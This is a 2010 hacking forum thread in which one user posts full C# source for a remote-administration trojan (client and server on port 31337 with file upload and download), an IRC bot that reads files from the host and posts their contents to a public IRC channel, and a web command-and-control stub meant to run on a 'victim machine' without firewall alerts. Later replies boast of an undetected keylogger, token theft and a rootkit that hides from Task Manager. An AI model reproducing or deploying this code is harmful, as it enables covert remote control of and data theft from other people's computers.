JMC31337 Posted June 14, 2010 Posted June 14, 2010 (edited) plenty of examples on the net like Chickenbutt said//JMC31337//ConnEX//CLIENTusing System;using System.Collections.Generic;using System.Text;using System.IO;using System.Net;using System.Net.Sockets;namespace Client{ class Program { static void Main(string[] args) { string download = "download"; string upload = "upload"; ASCIIEncoding ASCII = new ASCIIEncoding(); Byte[] outstream = new Byte[99999]; Console.WriteLine("ConnEX Admin TOOL (CLIENT) Started"); int port = 31337; Console.WriteLine("Enter IP address: "); string servip = Console.ReadLine(); try { TcpClient cl = new TcpClient(servip, port); if (cl.Connected) { try { Stream mystream = cl.GetStream(); string cmd = null; do { cmd = Console.ReadLine(); if (cmd == "Exit") { Console.WriteLine("Telling Server to Stop, Press Any Key"); Console.ReadLine(); outstream = ASCII.GetBytes(cmd); mystream.Write(outstream, 0, outstream.Length); cl.Close(); System.Environment.Exit(111); } else if (cmd.StartsWith(upload)) { string[] ftext = cmd.Split(' '); try { if (ftext.Length != 5 || ftext[4].Equals("")) { Console.WriteLine("Invalid Params!"); } else { Console.WriteLine("Upload CMD TEST"); Console.WriteLine("CMD:" + ftext[0]); Console.WriteLine("DRIVE:" + ftext[1]); Console.WriteLine("FILE:" + ftext[2]); Console.WriteLine("2DIR:" + ftext[3]); Console.WriteLine("2FILE:" + ftext[4]); Console.Write("Press Any Key to SEND"); Console.ReadLine(); if (File.Exists(@""+ftext[1] + ftext[2])) { Console.WriteLine("Local File Exist!"); try { string hexString = string.Empty; byte[] buff = new Byte[99999]; byte[] bitty1 = new Byte[99999]; byte[] bitty = new Byte[99999]; FileStream fs = new FileStream(@"" + ftext[1] + ftext[2], FileMode.Open, FileAccess.Read); BinaryReader br = new BinaryReader(fs); long numBytes = new FileInfo(@"" + ftext[1] + ftext[2]).Length; buff = br.ReadBytes((int)numBytes); outstream = ASCII.GetBytes(cmd); mystream.Write(outstream, 0, outstream.Length); //mystream.Write(buff, 0, buff.Length); for (int i = 0; i < buff.Length; i++) { //THNX to sandeeprwt hexString += buff[i].ToString("X2"); } bitty1 = ASCII.GetBytes(hexString); mystream.Write(bitty1, 0, bitty1.Length); //THNX STACKOVERFLOW============================= byte[] resp = new Byte[99999]; int bytesRead = mystream.Read(resp, 0, resp.Length); string cm = null; cm = ASCII.GetString(resp, 0, bytesRead); Console.WriteLine(cm); //=============================================== } catch (Exception e) { Console.WriteLine("ERROR"); } } else { Console.WriteLine("Local File Does Not Exist!"); } } } catch (Exception e) {} } else if (cmd.StartsWith(download)) { string[] ftext = cmd.Split(' '); try { if (ftext.Length != 5 || ftext[4].Equals("")) { Console.WriteLine("Invalid Params!"); } else { Console.WriteLine("Upload CMD TEST"); Console.WriteLine("CMD:" + ftext[0]); Console.WriteLine("From DRIVE:" + ftext[1]); Console.WriteLine("From FILE:" + ftext[2]); Console.WriteLine("2 Local DIR:" + ftext[3]); Console.WriteLine("2 Local FILE:" + ftext[4]); Console.Write("Press Any Key to RECEIVE"); Console.ReadLine(); outstream = ASCII.GetBytes(cmd); mystream.Write(outstream, 0, outstream.Length); byte[] resp2 = new Byte[99999]; int bytesRead2 = mystream.Read(resp2, 0, resp2.Length); string cm2 = null; cm2 = ASCII.GetString(resp2, 0, bytesRead2); Console.WriteLine(cm2); //============================================= byte[] resp3 = new Byte[99999]; int bytesRead3 = mystream.Read(resp3, 0, resp3.Length); string cm3 = null; cm3 = ASCII.GetString(resp3, 0, bytesRead3); Console.WriteLine(cm3); int NumberChars = cm3.Length; byte[] bytes = new byte[NumberChars / 2]; for (int i = 0; i < NumberChars; i += 2) { bytes[i / 2] = Convert.ToByte(cm3.Substring(i, 2), 16); } BinaryWriter bw = new BinaryWriter(new FileStream(@"" + ftext[3] + ftext[4], FileMode.OpenOrCreate)); bw.Write(bytes); bw.Close(); Console.WriteLine("FILE RECEIVED!"); } } catch (Exception e) { } } else { outstream = ASCII.GetBytes(cmd); mystream.Write(outstream, 0, outstream.Length); } } while (cmd != null); } catch (Exception e) { cl.Close(); System.Environment.Exit(111); } } } catch (Exception e) { Console.WriteLine("YOUR NOT ON A NETWORK or SERVER UNREACHABLE!"); Console.WriteLine("Press Any Key"); Console.ReadLine(); } } }}//JMC31337//ConnEX//SERVERusing System;using System.Collections.Generic;using System.Text;using System.IO;using System.Net;using System.Net.Sockets;using System.Runtime.InteropServices;namespace Serv{ class Program { [DllImport("winmm.dll")] static extern Int32 mciSendString(String command, StringBuilder buffer, Int32 bufferSize, IntPtr hwndCallback); [DllImport("user32.dll", CharSet = CharSet.Auto)] private static extern int MessageBox(int hWnd, String text, String caption, uint type); static void Main(string[] args) { Byte[] stream = new Byte[99999]; ASCIIEncoding ASCII = new ASCIIEncoding(); string add = ""; string serv = ""; string cmd = null; string msg = "msg"; string upload = "upload"; string download = "download"; int port = 31337; IPHostEntry host = Dns.Resolve(serv); string[] aliases = host.Aliases; IPAddress[] addr = host.AddressList; add = addr[0].ToString(); IPAddress addx = IPAddress.Parse(add); TcpListener tcp = new TcpListener(addx, port); Console.WriteLine("Server IP: " + addx); Console.WriteLine("Port: " + port); Console.WriteLine("Press Any Key To Continue"); Console.WriteLine("---------------------------"); Console.ReadLine(); Console.WriteLine("ConnEX Admin Tool (Server) Started"); tcp.Start(); Socket sock = tcp.AcceptSocket(); sock.Blocking = true; if (sock.Connected) { do { try { int count = sock.Receive(stream, stream.Length, 0); cmd = ASCII.GetString(stream, 0, count); //Send(sock); if (cmd == "Exit" ) { System.Environment.Exit(111); } else if (cmd == "PopCDOpen") { mciSendString("set CDAudio door open", null, 0, IntPtr.Zero); } else if (cmd == "PopCDClose") { mciSendString("set CDAudio door closed", null, 0, IntPtr.Zero); } else if (cmd.StartsWith(msg)) { string[] text = cmd.Split(' '); if (text.Length!=2 || text[1].Equals("")) { } else { MessageBox(0, text[1], "MESSAGE", 1); } } else if (cmd.StartsWith(upload)) { string[] uftext = cmd.Split(' '); try { string test = "File Upload Completed!"; byte[] buff = new Byte[99999]; Byte[] newx = ASCII.GetBytes(test); Console.WriteLine(uftext[0]); Console.WriteLine(uftext[1]); Console.WriteLine(uftext[2]); Console.WriteLine(uftext[3]); Console.WriteLine(uftext[4]); string cmd2 = null; Byte[] stream2 = new Byte[99999]; int count2 = sock.Receive(stream2, stream2.Length, 0); cmd2 = ASCII.GetString(stream2, 0, count2); //THNX STACKOVERFLOW=================================== int NumberChars = cmd2.Length; byte[] bytes = new byte[NumberChars / 2]; for (int i = 0; i < NumberChars; i += 2) { bytes[i / 2] = Convert.ToByte(cmd2.Substring(i, 2), 16); } //======================================================== BinaryWriter bw = new BinaryWriter(new FileStream(@"" + uftext[3] + uftext[4], FileMode.OpenOrCreate)); bw.Write(bytes); bw.Close(); //TextWriter writeFile = new StreamWriter(@"" + uftext[3] + uftext[4]); //writeFile.Write(bytes); //writeFile.Close(); Console.WriteLine(cmd2); sock.Send(newx); } catch (Exception e) { } } else if (cmd.StartsWith(download)) { string[] dftext = cmd.Split(' '); try { Console.WriteLine(dftext[0]); Console.WriteLine(dftext[1]); Console.WriteLine(dftext[2]); Console.WriteLine(dftext[3]); Console.WriteLine(dftext[4]); if (File.Exists(@"" + dftext[1] + dftext[2])) { string tests = "Receiving File!"; Byte[] newxs = ASCII.GetBytes(tests); sock.Send(newxs); try { string hexString = string.Empty; byte[] buff = new Byte[99999]; byte[] bitty1 = new Byte[99999]; byte[] bitty = new Byte[99999]; FileStream fs = new FileStream(@"" + dftext[1] + dftext[2], FileMode.Open, FileAccess.Read); BinaryReader br = new BinaryReader(fs); long numBytes = new FileInfo(@"" + dftext[1] + dftext[2]).Length; buff = br.ReadBytes((int)numBytes); for (int i = 0; i < buff.Length; i++) { //THNX to sandeeprwt hexString += buff[i].ToString("X2"); } bitty1 = ASCII.GetBytes(hexString); sock.Send(bitty1); } catch (Exception e) { Console.WriteLine("ERROR"); } } else { string tests2 = "File Does Not Exist!"; Byte[] newxs2 = ASCII.GetBytes(tests2); sock.Send(newxs2); } } catch (Exception e) { } } else { System.Console.WriteLine(cmd); } } catch (Exception e) { sock.Close(); System.Environment.Exit(111); } } while (true); } } } }/*try { Directory.CreateDirectory(@"" + ftext[3]); } catch (Exception e) { Console.WriteLine("Either You Dont Have Access Permission Or Directory Could Not Be Created"); }*/using System;using System.Collections.Generic;using System.Linq;using System.Text;using System.Net;using System.Net.Sockets;using System.IO;namespace Bot{ class Program { static void Main(string[] args) { string SERVER = "irc.dal.net"; int PORT = 6667; string USER = "USER BotHOUND 8 * :I'm a lil C# irc bot"; string NICK = "BotHOUND"; string CHANNEL = "#testtest"; StreamWriter writer; NetworkStream stream; TcpClient irc; string inputLine; StreamReader reader; string nickname; irc = new TcpClient(SERVER, PORT); stream = irc.GetStream(); reader = new StreamReader(stream); writer = new StreamWriter(stream); writer.WriteLine(USER); writer.Flush(); writer.WriteLine("NICK " + NICK); writer.Flush(); writer.WriteLine("JOIN " + CHANNEL); writer.Flush(); while (true) { while ((inputLine = reader.ReadLine()) != null) { Console.WriteLine(inputLine); if (inputLine.EndsWith("bot die")) { writer.WriteLine("NOTICE #testtest BOT shut down sequence initiated"); writer.Flush(); System.Environment.Exit(111); } else if (inputLine.Contains("read hex")) { int counter = 0; Console.WriteLine("HERE IT IS!"); string[] array = null; array = inputLine.Split(' '); writer.WriteLine("NOTICE #testtest BOT found file " + array[5]); writer.Flush(); writer.WriteLine("NOTICE #testtest BOT listing file contents in HEX"); writer.Flush(); StreamReader sr = new StreamReader(array[5]); string FirstLine; string hex = null; while ((FirstLine = sr.ReadLine()) != null) { foreach (char c in FirstLine) { int tmp = c; hex += String.Format("{0:x2}", (uint)System.Convert.ToUInt32(tmp.ToString())); } writer.WriteLine("NOTICE #testtest " + hex); writer.Flush(); System.Threading.Thread.Sleep(3000); } sr.Close(); } else if (inputLine.Contains("read plain")) { Console.WriteLine("HERE IT IS!"); string[] arrayx = null; arrayx = inputLine.Split(' '); writer.WriteLine("NOTICE #testtest BOT found file " + arrayx[5]); writer.Flush(); writer.WriteLine("NOTICE #testtest BOT listing file contents in plaintext"); writer.Flush(); StreamReader sr2 = new StreamReader(arrayx[5]); string FirstLine2; while ((FirstLine2 = sr2.ReadLine()) != null) { writer.WriteLine("NOTICE #testtest " + FirstLine2); writer.Flush(); System.Threading.Thread.Sleep(3000); } sr2.Close(); } } writer.Close(); reader.Close(); irc.Close(); } } }}And finally for Web Command and Control, have a website setup to feed a <html_NOTPEAD> in its index3.html page... run this on the victim machine and Notepad will spawn, no big deal really, EXCEPT that ZoneAlarm and MCSFT Firewall wont ALERT the user to anything...using System;using System.IO;using System.Net;using System.Text;namespace WebGet{ class Webget { public static void Main() { // Create a request for the URL. WebRequest request = WebRequest.Create( "http://www.firewal.bypass.com/index3.html"); // If required by the server, set the credentials. request.Credentials = CredentialCache.DefaultCredentials; // Get the response. WebResponse response = request.GetResponse(); // Display the status. Console.WriteLine(((HttpWebResponse)response).StatusDescription); // Get the stream containing content returned by the server. Stream dataStream = response.GetResponseStream(); // Open the stream using a StreamReader for easy access. StreamReader reader = new StreamReader(dataStream); // Read the content. string responseFromServer = reader.ReadLine(); // Display the content. Console.WriteLine(responseFromServer); Console.ReadLine(); // Clean up the streams and the response. reader.Close(); response.Close(); if(responseFromServer=="<html_NOTEPAD>") { string WorkingDirectory = "C:\\Windows"; try { System.Diagnostics.Process p = new System.Diagnostics.Process(); p.StartInfo.CreateNoWindow = true; p.StartInfo.WorkingDirectory = WorkingDirectory; p.StartInfo.FileName = WorkingDirectory + "\\" + "notepad.exe"; p.StartInfo.Arguments = null; // build here the arguments p.EnableRaisingEvents = true; // if you want to capture events p.StartInfo.UseShellExecute = false; p.Start(); } catch(Exception exProcess){} } } }} Edited December 15, 2010 by JMC31337
chickenbutt Posted August 25, 2010 Posted August 25, 2010 (edited) There are a lot of these on the net, mostly in delphi, .net, and vb6. I could kill this with group policy, or just use a AV with HIPS which is pretty much all of them now.I have something that is nothing more than a exe and dll that doesn't get detected by RKU 3.8 or any up-to-date HIPS, but can keylog anything and connect back through even process-restricted firewalls. Also doesn't disable anything or show in taskmanager, and is only ring3. It can also steal tokens without ring0. uses 0-exploits.I only use IRC too though, I don't write malware which is why I don't bother implementing DNS fluxing or something. Edited August 25, 2010 by chickenbutt
JMC31337 Posted December 15, 2010 Author Posted December 15, 2010 (edited) There are a lot of these on the net, mostly in delphi, .net, and vb6. I could kill this with group policy, or just use a AV with HIPS which is pretty much all of them now.I have something that is nothing more than a exe and dll that doesn't get detected by RKU 3.8 or any up-to-date HIPS, but can keylog anything and connect back through even process-restricted firewalls. Also doesn't disable anything or show in taskmanager, and is only ring3. It can also steal tokens without ring0. uses 0-exploits.I only use IRC too though, I don't write malware which is why I don't bother implementing DNS fluxing or something.true.. created a rootkit with />http://www.vijaymukhi.com/security/rootkit/devicedriverhidingprograms1.htmand it hid itself from task manager on XP SP3, keep in mind with the new SDK i couldnt compile the strnicmp and had to use strcmp "exename.exe" insteadas far as a tcpip rootkit filter.. havent tried one yet...anyone know if that is how these drivers get past the firewalls?? Edited December 15, 2010 by JMC31337
Recommended Posts
Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
Register a new accountSign in
Already have an account? Sign in here.
Sign In Now